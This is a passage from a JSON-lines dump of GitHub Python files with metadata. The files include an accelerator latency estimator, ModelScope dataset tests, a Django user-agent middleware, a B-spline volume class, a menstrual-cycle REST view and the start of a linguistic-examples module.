"os.path.basename", "line_number": 128, "usage_type": "call"}, {"api_name": "pydtk.utils.utils.smart_open", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 131, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "777199730", "text": "import argparse\nfrom pathlib import Path\n\nimport pandas as pd\n\n\ndef calc_sanger_latency(sparsity, load_balance, seq_len):\n # Q, K, V: [seq_len, QKV_WIDTH]\n # S (original): [seq_len, seq_len]\n # S (after pack & split): [num_subrows, seq_len]\n\n TH, TW = 64, 64 # PE array: TH x TW\n NUM_PE_PER_ROW = 16\n DATA_TYPE = 2 # 16 bit, 2 Byte\n FREQUENCY = 1e9 # 1G\n REAL_BANDWIDTH = 128 # 128 GB/s\n\n QKV_WIDTH = 768\n num_subrows = sparsity / load_balance / 0.25 * seq_len # average number of subrows after pack & split\n\n LINEAR_GOPS = TH * NUM_PE_PER_ROW * 1 * 2 # pe-size * 1(GHz) * 2(ops/mac) = 2048\n PROJ_GOPS = LINEAR_GOPS / sparsity * load_balance\n \n LAT_linear = seq_len * QKV_WIDTH * QKV_WIDTH * 2 * 3 / 1e9 / LINEAR_GOPS\n LAT_project = seq_len * QKV_WIDTH * QKV_WIDTH * 2 / 1e9 / PROJ_GOPS\n\n # latency of Q_tile x K_tile\n LAT_Qt_Kt = QKV_WIDTH + TW # pipeline depth is QKV_WIDTH , TW is the access 
skew\n\n # latency of S_tile x V_tile\n LAT_St_Vt = num_subrows + TW # pipeline depth is QKV_HEIGHT\n\n # Latency to calculate a THxTW output using QKV\n LAT_TH_TW_output_tile = LAT_Qt_Kt + LAT_St_Vt\n\n # Latency to calculate a THxSEQUENCE_LENGTH output by changing K and V\n LAT_TH_SEQL_output_tile = LAT_TH_TW_output_tile * (seq_len / TW)\n\n # to overlap the latency, we need to read TH+TW data per cycle\n # reuse Q in buffer, stream K and V\n required_bandwidth = TW * DATA_TYPE * FREQUENCY / 1e9\n\n if required_bandwidth < REAL_BANDWIDTH:\n transfer_coeff = 1\n else:\n transfer_coeff = required_bandwidth / REAL_BANDWIDTH\n\n # final latency to calculate a THxSEQUENCE_LENGTH output\n LAT_final_TH_SEQL_output_tile = LAT_TH_SEQL_output_tile * transfer_coeff\n\n # final latency to calculate a complete output\n LAT_final = (num_subrows / TH) * LAT_final_TH_SEQL_output_tile \n\n return LAT_linear + LAT_final / FREQUENCY + LAT_project\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--sparsity\", default=None, type=float, required=False)\n parser.add_argument(\"--load_balance\", default=None, type=float, required=False)\n parser.add_argument(\"--seq_len\", default=512, type=int, required=False)\n parser.add_argument(\"--csv_file\", default=\"load_balance.csv\", type=str, required=False, \n help=\"Path to the csv file generated by gen_sparsity_mask.\")\n args = parser.parse_args()\n \n if args.sparsity is not None:\n assert args.load_balance is not None\n total_lat = calc_sanger_latency(args.sparsity, args.load_balance, args.seq_len)\n print(f\"Sanger Latency: {total_lat * 1000:.3f} ms\")\n else:\n assert Path(args.csv_file).exists(), f\"{args.csv_file} does not exist.\"\n metrics = pd.read_csv(args.csv_file).mean()\n sparsity = metrics['overall-sparsity']\n print(f\"Average Sparsity: {sparsity:.3f}\")\n for lb_key in ['50%-no-skip', '50%-skip', '25%-no-skip', '25%-skip']:\n load_balance = metrics[lb_key]\n total_lat = calc_sanger_latency(sparsity, load_balance, args.seq_len)\n print(f\"Load Balance ({lb_key}): {load_balance:.3f}\")\n print(f\"Sanger Latency ({lb_key}): {total_lat * 1000:.3f} ms\")\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "hatsu3/Sanger", "sub_path": "bench_sanger_v2.py", "file_name": "bench_sanger_v2.py", "file_ext": "py", "file_size_in_byte": 3293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 58, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "23265850015", "text": "# Copyright (c) Alibaba, Inc. 
and its affiliates.\r\n\r\nimport unittest\r\n\r\nfrom modelscope.models import Model\r\nfrom modelscope.msdatasets import MsDataset\r\nfrom modelscope.preprocessors import SequenceClassificationPreprocessor\r\nfrom modelscope.preprocessors.base import Preprocessor\r\nfrom modelscope.utils.constant import DEFAULT_DATASET_NAMESPACE, DownloadMode\r\nfrom modelscope.utils.test_utils import require_tf, require_torch, test_level\r\n\r\n\r\nclass ImgPreprocessor(Preprocessor):\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.path_field = kwargs.pop('image_path', 'image_path')\r\n self.width = kwargs.pop('width', 'width')\r\n self.height = kwargs.pop('height', 'height')\r\n\r\n def __call__(self, data):\r\n import cv2\r\n image_path = data.get(self.path_field)\r\n if not image_path:\r\n return None\r\n img = cv2.imread(image_path)\r\n return {\r\n 'image':\r\n cv2.resize(img,\r\n (data.get(self.height, 128), data.get(self.width, 128)))\r\n }\r\n\r\n\r\nclass MsDatasetTest(unittest.TestCase):\r\n\r\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\r\n def test_movie_scene_seg_toydata(self):\r\n ms_ds_train = MsDataset.load('movie_scene_seg_toydata', split='train')\r\n print(ms_ds_train._hf_ds.config_kwargs)\r\n assert next(iter(ms_ds_train.config_kwargs['split_config'].values()))\r\n\r\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\r\n def test_coco(self):\r\n ms_ds_train = MsDataset.load(\r\n 'pets_small',\r\n namespace=DEFAULT_DATASET_NAMESPACE,\r\n download_mode=DownloadMode.FORCE_REDOWNLOAD,\r\n split='train')\r\n print(ms_ds_train.config_kwargs)\r\n assert next(iter(ms_ds_train.config_kwargs['split_config'].values()))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n def test_ms_csv_basic(self):\r\n ms_ds_train = MsDataset.load(\r\n 'clue', subset_name='afqmc',\r\n split='train').to_hf_dataset().select(range(5))\r\n print(next(iter(ms_ds_train)))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n def test_ds_basic(self):\r\n ms_ds_full = MsDataset.load(\r\n 'xcopa', subset_name='translation-et', namespace='damotest')\r\n ms_ds = MsDataset.load(\r\n 'xcopa',\r\n subset_name='translation-et',\r\n namespace='damotest',\r\n split='test')\r\n print(next(iter(ms_ds_full['test'])))\r\n print(next(iter(ms_ds)))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n @require_torch\r\n def test_to_torch_dataset_text(self):\r\n model_id = 'damo/nlp_structbert_sentence-similarity_chinese-tiny'\r\n nlp_model = Model.from_pretrained(model_id)\r\n preprocessor = SequenceClassificationPreprocessor(\r\n nlp_model.model_dir,\r\n first_sequence='premise',\r\n second_sequence=None,\r\n padding='max_length')\r\n ms_ds_train = MsDataset.load(\r\n 'xcopa',\r\n subset_name='translation-et',\r\n namespace='damotest',\r\n split='test')\r\n pt_dataset = ms_ds_train.to_torch_dataset(preprocessors=preprocessor)\r\n import torch\r\n dataloader = torch.utils.data.DataLoader(pt_dataset, batch_size=5)\r\n print(next(iter(dataloader)))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n @require_tf\r\n def test_to_tf_dataset_text(self):\r\n import tensorflow as tf\r\n tf.compat.v1.enable_eager_execution()\r\n model_id = 'damo/nlp_structbert_sentence-similarity_chinese-tiny'\r\n nlp_model = Model.from_pretrained(model_id)\r\n preprocessor = SequenceClassificationPreprocessor(\r\n 
nlp_model.model_dir,\r\n first_sequence='premise',\r\n second_sequence=None)\r\n ms_ds_train = MsDataset.load(\r\n 'xcopa',\r\n subset_name='translation-et',\r\n namespace='damotest',\r\n split='test')\r\n tf_dataset = ms_ds_train.to_tf_dataset(\r\n batch_size=5,\r\n shuffle=True,\r\n preprocessors=preprocessor,\r\n drop_remainder=True)\r\n print(next(iter(tf_dataset)))\r\n\r\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\r\n @require_torch\r\n def test_to_torch_dataset_img(self):\r\n ms_image_train = MsDataset.load(\r\n 'fixtures_image_utils', namespace='damotest', split='test')\r\n pt_dataset = ms_image_train.to_torch_dataset(\r\n preprocessors=ImgPreprocessor(image_path='file'))\r\n import torch\r\n dataloader = torch.utils.data.DataLoader(pt_dataset, batch_size=5)\r\n print(next(iter(dataloader)))\r\n\r\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\r\n @require_tf\r\n def test_to_tf_dataset_img(self):\r\n import tensorflow as tf\r\n tf.compat.v1.enable_eager_execution()\r\n ms_image_train = MsDataset.load(\r\n 'fixtures_image_utils', namespace='damotest', split='test')\r\n tf_dataset = ms_image_train.to_tf_dataset(\r\n batch_size=5,\r\n shuffle=True,\r\n preprocessors=ImgPreprocessor(image_path='file'),\r\n drop_remainder=True,\r\n )\r\n print(next(iter(tf_dataset)))\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n", "repo_name": "sdjamesliu/alldata", "sub_path": "ai/modelscope-versions/modelscope-master/tests/msdatasets/test_ms_dataset.py", "file_name": "test_ms_dataset.py", "file_ext": "py", "file_size_in_byte": 5576, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "modelscope.preprocessors.base.Preprocessor", "line_number": 13, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 34, "usage_type": "attribute"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 38, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 36, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 36, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 44, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 44, "usage_type": "name"}, {"api_name": "modelscope.utils.constant.DEFAULT_DATASET_NAMESPACE", "line_number": 46, "usage_type": "name"}, {"api_name": "modelscope.utils.constant.DownloadMode.FORCE_REDOWNLOAD", "line_number": 47, "usage_type": "attribute"}, {"api_name": "modelscope.utils.constant.DownloadMode", "line_number": 47, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 42, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 42, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 54, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 54, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 52, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 52, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 61, "usage_type": 
"call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 61, "usage_type": "name"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 63, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 63, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 59, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 59, "usage_type": "call"}, {"api_name": "modelscope.models.Model.from_pretrained", "line_number": 75, "usage_type": "call"}, {"api_name": "modelscope.models.Model", "line_number": 75, "usage_type": "name"}, {"api_name": "modelscope.preprocessors.SequenceClassificationPreprocessor", "line_number": 76, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 81, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 88, "usage_type": "attribute"}, {"api_name": "unittest.skipUnless", "line_number": 71, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 71, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_torch", "line_number": 72, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.enable_eager_execution", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 95, "usage_type": "attribute"}, {"api_name": "modelscope.models.Model.from_pretrained", "line_number": 97, "usage_type": "call"}, {"api_name": "modelscope.models.Model", "line_number": 97, "usage_type": "name"}, {"api_name": "modelscope.preprocessors.SequenceClassificationPreprocessor", "line_number": 98, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 102, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 102, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 91, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 91, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_tf", "line_number": 92, "usage_type": "name"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 117, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 122, "usage_type": "attribute"}, {"api_name": "unittest.skipUnless", "line_number": 114, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 114, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_torch", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.enable_eager_execution", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 129, "usage_type": "attribute"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 130, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 130, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 125, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 125, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_tf", 
"line_number": 126, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "41957573142", "text": "import re\nfrom django_seo_js import settings\nfrom django_seo_js.backends import SelectedBackend\nfrom django_seo_js.helpers import request_should_be_ignored\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass UserAgentMiddleware(SelectedBackend):\n def __init__(self, *args, **kwargs):\n super(UserAgentMiddleware, self).__init__(*args, **kwargs)\n regex_str = \"|\".join(settings.USER_AGENTS)\n regex_str = \".*?(%s)\" % regex_str\n self.USER_AGENT_REGEX = re.compile(regex_str, re.IGNORECASE)\n\n def process_request(self, request):\n if not settings.ENABLED:\n return\n\n if request_should_be_ignored(request):\n return\n\n if \"HTTP_USER_AGENT\" not in request.META:\n return\n\n if not self.USER_AGENT_REGEX.match(request.META[\"HTTP_USER_AGENT\"]):\n return\n\n url = self.backend.build_absolute_uri(request)\n try:\n return self.backend.get_response_for_url(url, request)\n except Exception as e:\n logger.exception(e)\n", "repo_name": "skoczen/django-seo-js", "sub_path": "django_seo_js/middleware/useragent.py", "file_name": "useragent.py", "file_ext": "py", "file_size_in_byte": 1051, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 200, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "django_seo_js.backends.SelectedBackend", "line_number": 10, "usage_type": "name"}, {"api_name": "django_seo_js.settings.USER_AGENTS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django_seo_js.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django_seo_js.settings.ENABLED", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django_seo_js.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django_seo_js.helpers.request_should_be_ignored", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "716015685", "text": "import numpy as np\nimport scipy.interpolate as si\n\nclass BSplineVolume:\n def __init__(self, Parameters):\n ''' Constructor of BSplineVolume \\n\n Takes QuESo::Parameters as input.\n '''\n self.Order = Parameters.Order()\n NumElements = Parameters.NumberOfElements()\n LowerBoundXYZ = Parameters.LowerBoundXYZ()\n UpperBoundXYZ = Parameters.UpperBoundXYZ()\n LowerBoundUVW = Parameters.LowerBoundUVW()\n UpperBoundUVW = Parameters.UpperBoundUVW()\n knot_vector_type = Parameters.GetGlobalSettings().GetString(\"knot_vector_type\")\n if( knot_vector_type == \"open_knot_vector\" ):\n open_knot_vector = True\n elif( knot_vector_type == \"non_open_knot_vector\" ):\n open_knot_vector = False\n else:\n message = \"BSplineVolume :: __init__ :: Given 'knot_vector_type': '\" + knot_vector_type\n message += \"' not valid. 
Available options are: 'open_knot_vector' and 'non_open_knot_vector'.\"\n raise Exception(message)\n self.spline_u = self.__construct_b_spline(\n self.Order[0], NumElements[0], LowerBoundXYZ[0], UpperBoundXYZ[0], LowerBoundUVW[0], UpperBoundUVW[0], open_knot_vector)\n self.spline_v = self.__construct_b_spline(\n self.Order[1], NumElements[1], LowerBoundXYZ[1], UpperBoundXYZ[1], LowerBoundUVW[1], UpperBoundUVW[1], open_knot_vector)\n self.spline_w = self.__construct_b_spline(\n self.Order[2], NumElements[2], LowerBoundXYZ[2], UpperBoundXYZ[2], LowerBoundUVW[2], UpperBoundUVW[2], open_knot_vector)\n\n def GetSpline(self, Index):\n if( Index == 0 ):\n return self.spline_u\n elif( Index == 1 ):\n return self.spline_v\n elif( Index == 2 ):\n return self.spline_w\n else:\n raise Exception(\"BSplineVolume :: GetSpline :: Index out of scope.\")\n\n def ControlPoints(self):\n ''' Returns control points of B-Spline volume in a list.\n The point indices are linearized and can be accessed the following:\n\n cps = self.ControlPoints() \\n\n count = 0 \\n\n for i_w in range(NumberControlPointsInW()):\n for i_v in range(NumberControlPointsInV()):\n for i_u in range(NumberControlPointsInU()):\n point = cps[count] \\n\n count += 1\n '''\n cps = []\n for z in self.spline_w.c:\n for y in self.spline_v.c:\n for x in self.spline_u.c:\n cps.append( [x, y, z] )\n return cps\n\n def ControlPointsMatrix(self):\n ''' Returns control points of B-Spline volume in a matrix.\n Points can be accessed as:\n\n cps = self.ControlPoints() \\n\n for i_w in range(NumberControlPointsInW()):\n for i_v in range(NumberControlPointsInV()):\n for i_u in range(NumberControlPointsInU()):\n point = cps[i_u, i_v, i_w]\n '''\n n_cps_u = self.NumberControlPointsInU()\n n_cps_v = self.NumberControlPointsInV()\n n_cps_w = self.NumberControlPointsInW()\n n_cps = n_cps_u*n_cps_v*n_cps_w\n\n cps = np.zeros(n_cps*3).reshape(n_cps_u, n_cps_v, n_cps_w, 3)\n for i_z, z in enumerate(self.spline_w.c):\n for i_y, y in enumerate(self.spline_v.c):\n for i_x, x in enumerate(self.spline_u.c):\n cps[i_x, i_y, i_z] = [x, y, z]\n\n return cps\n\n def KnotsU(self):\n ''' KnotsU \\n\n Returns knot vector along u- (x) direction.\n '''\n return self.spline_u.t.tolist()\n\n def KnotsV(self):\n ''' KnotsV \\n\n Returns knot vector along v- (y) direction.\n '''\n return self.spline_v.t.tolist()\n\n def KnotsW(self):\n ''' KnotsW \\n\n Returns knot vector along w- (z) direction.\n '''\n return self.spline_w.t.tolist()\n\n def PolynomialOrder(self):\n ''' PolynomialOrder \\n\n Returns polynomial order of b-spline volume: [p_x, p_y, p_z]\n '''\n return self.Order\n\n def NumberControlPointsInU(self):\n ''' NumberControlPointsInU \\n\n Returns number of control points in u- (x) direction.\n '''\n return len(self.spline_u.c)\n\n def NumberControlPointsInV(self):\n ''' NumberControlPointsInV \\n\n Returns number of control points in v- (y) direction.\n '''\n return len(self.spline_v.c)\n\n def NumberControlPointsInW(self):\n ''' NumberControlPointsInW \\n\n Returns number of control points in w- (z) direction.\n '''\n return len(self.spline_w.c)\n\n def __construct_b_spline(self, Order, NumElements, LowerBoundX, UpperBoundX, LowerBoundU, UpperBoundU, OpenKnotVector=False):\n delta_u = (UpperBoundU-LowerBoundU)/NumElements\n\n if OpenKnotVector:\n knots_u = np.array( (Order+1)*[LowerBoundU] )\n knots_u = np.append( knots_u, (Order+1)*[UpperBoundU] )\n else:\n knots_u = np.array( [LowerBoundU - (Order-i)*delta_u for i in range(Order+1)] )\n knots_u = np.append( knots_u, 
[(UpperBoundU + i*delta_u) for i in range(Order+1)] )\n\n delta_x = (UpperBoundX-LowerBoundX) / Order\n center = (UpperBoundX+LowerBoundX) / 2.0\n cps_x = np.arange(LowerBoundX, UpperBoundX+0.5*delta_x, delta_x )\n\n if not OpenKnotVector:\n cps_x = [ val - (Order-1)*(center-val) / (NumElements) for val in cps_x ]\n\n spline_u = si.BSpline(knots_u, cps_x, Order, extrapolate=False)\n knots_u_to_insert = np.arange(LowerBoundU+delta_u, UpperBoundU-0.5*delta_u, delta_u)\n\n for knot in knots_u_to_insert:\n spline_u = si.insert(knot, spline_u)\n\n num_cps = len(spline_u.t) - Order - 1\n spline_u.c = spline_u.c[:num_cps]\n\n return spline_u\n\n", "repo_name": "manuelmessmer/QuESo", "sub_path": "queso/python_scripts/b_spline_volume.py", "file_name": "b_spline_volume.py", "file_ext": "py", "file_size_in_byte": 5909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "86", "api": [{"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 137, "usage_type": "call"}, {"api_name": "scipy.interpolate.BSpline", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 142, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.interpolate.insert", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "17676691696", "text": "from rest_framework import permissions, status,response\nfrom rest_framework.generics import CreateAPIView,UpdateAPIView\nfrom menstrual_cycle.serializers import MenstrualCycleSerializer\nfrom menstrual_cycle.models import MenstrualCycle\nfrom helpers.utils import period_start_dates\nfrom django.db import IntegrityError\n\n\n\nclass CreateCycleView(CreateAPIView,UpdateAPIView,):\n permission_classes = (permissions.IsAuthenticated,)\n \"\"\"Creates new menstrual cycle info in the system\"\"\"\n serializer_class = MenstrualCycleSerializer\n\n\n def get_queryset(self):\n user = MenstrualCycle.objects.filter(owner=self.request.user)\n if not user:\n return response.Response({\"invalid_user\":\"no record found\"}, status=status.HTTP_400_BAD_REQUEST)\n return user\n\n def get_object(self):\n queryset = self.get_queryset()\n return queryset[0]\n\n def post(self, request):\n user_data = request.data\n serializer = self.serializer_class(data=user_data)\n Last_period_date = user_data.get('Last_period_date', '')\n Cycle_average = user_data.get('Cycle_average', '')\n Period_average = user_data.get('Period_average', '')\n Start_date = user_data.get('Start_date', '')\n End_date = user_data.get('End_date', '')\n \n if not serializer.is_valid():\n return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n owner =request.user\n name=owner.fullname\n period_dates = period_start_dates(Last_period_date,Cycle_average,Start_date,End_date)\n try:\n cycle,created = MenstrualCycle.objects.update_or_create(Last_period_date=Last_period_date,Cycle_average=Cycle_average,\n Period_average=Period_average,Start_date=Start_date,\n End_date=End_date,owner=owner\n )\n print(cycle)\n cycle.save()\n except IntegrityError:\n return 
response.Response({'message':'record for user already exists'}, status=status.HTTP_400_BAD_REQUEST)\n return response.Response({'name':name,'total_created_cycles':len(period_dates)}, status=status.HTTP_201_CREATED)\n\n def put(self, request, **kwargs):\n update_period = self.get_object()\n serializer = MenstrualCycleSerializer(data=request.data, partial=True)\n self.check_object_permissions(request,update_period)\n if serializer.is_valid():\n serializer.instance = update_period\n serializer.save()\n user_data = serializer.data\n Last_period_date = user_data.get('Last_period_date', '')\n Cycle_average = user_data.get('Cycle_average', '')\n Start_date = user_data.get('Start_date', '')\n End_date = user_data.get('End_date', '')\n period_dates = period_start_dates(Last_period_date,Cycle_average,Start_date,End_date)\n owner =request.user\n name=owner.fullname\n return response.Response({'name':name,'total_created_cycles':len(period_dates)}, status=status.HTTP_201_CREATED)\n return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n ", "repo_name": "Ladeologun/HEALTHAPI", "sub_path": "menstrual_cycle/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework.generics.CreateAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 11, "usage_type": "name"}, {"api_name": "menstrual_cycle.serializers.MenstrualCycleSerializer", "line_number": 13, "usage_type": "name"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "menstrual_cycle.models.MenstrualCycle", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 19, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 36, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 36, "usage_type": "name"}, {"api_name": "helpers.utils.period_start_dates", "line_number": 39, "usage_type": "call"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects.update_or_create", "line_number": 41, "usage_type": "call"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "menstrual_cycle.models.MenstrualCycle", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 48, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 48, "usage_type": "name"}, {"api_name": 
"rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 49, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 49, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 49, "usage_type": "name"}, {"api_name": "menstrual_cycle.serializers.MenstrualCycleSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "helpers.utils.period_start_dates", "line_number": 63, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 66, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 66, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 66, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 67, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 67, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "41893268852", "text": "# -*- coding: Latin-1 -*-\n\n\"\"\"\nGrab phonology or interlinear examples and insert them.\n\nThis module exports:\n ExServices\n EXTYPE_PHONOLOGY\n EXTYPE_INTERLINEAR\n\"\"\"\nimport logging\n\nfrom lingt.access.writer import outputmanager\nfrom lingt.access.writer import search\nfrom lingt.access.writer import styles\nfrom lingt.access.writer.ex_updater import ExUpdater\nfrom lingt.access.writer.uservars import Prefix, UserVars\nfrom lingt.access.xml.interlin_reader import InterlinReader\nfrom lingt.access.xml.phon_reader import PhonReader\nfrom lingt.app import exceptions\nfrom lingt.app.data import fileitemlist\nfrom lingt.app.data import lingex_structs\nfrom lingt.ui.common.messagebox import MessageBox\nfrom lingt.utils import util\n\nlogger = logging.getLogger(\"lingt.app.lingexamples\")\n\n# type of linguistic example\nEXTYPE_PHONOLOGY = 'phonology'\nEXTYPE_INTERLINEAR = 'interlinear'\n\nclass ExServices:\n \"\"\"Services that can conveniently be called from other modules.\"\"\"\n\n def __init__(self, exType, unoObjs):\n self.exType = exType\n self.unoObjs = unoObjs\n if self.exType == EXTYPE_PHONOLOGY:\n USERVAR_PREFIX = Prefix.PHONOLOGY\n else:\n USERVAR_PREFIX = Prefix.INTERLINEAR\n self.userVars = UserVars(\n USERVAR_PREFIX, 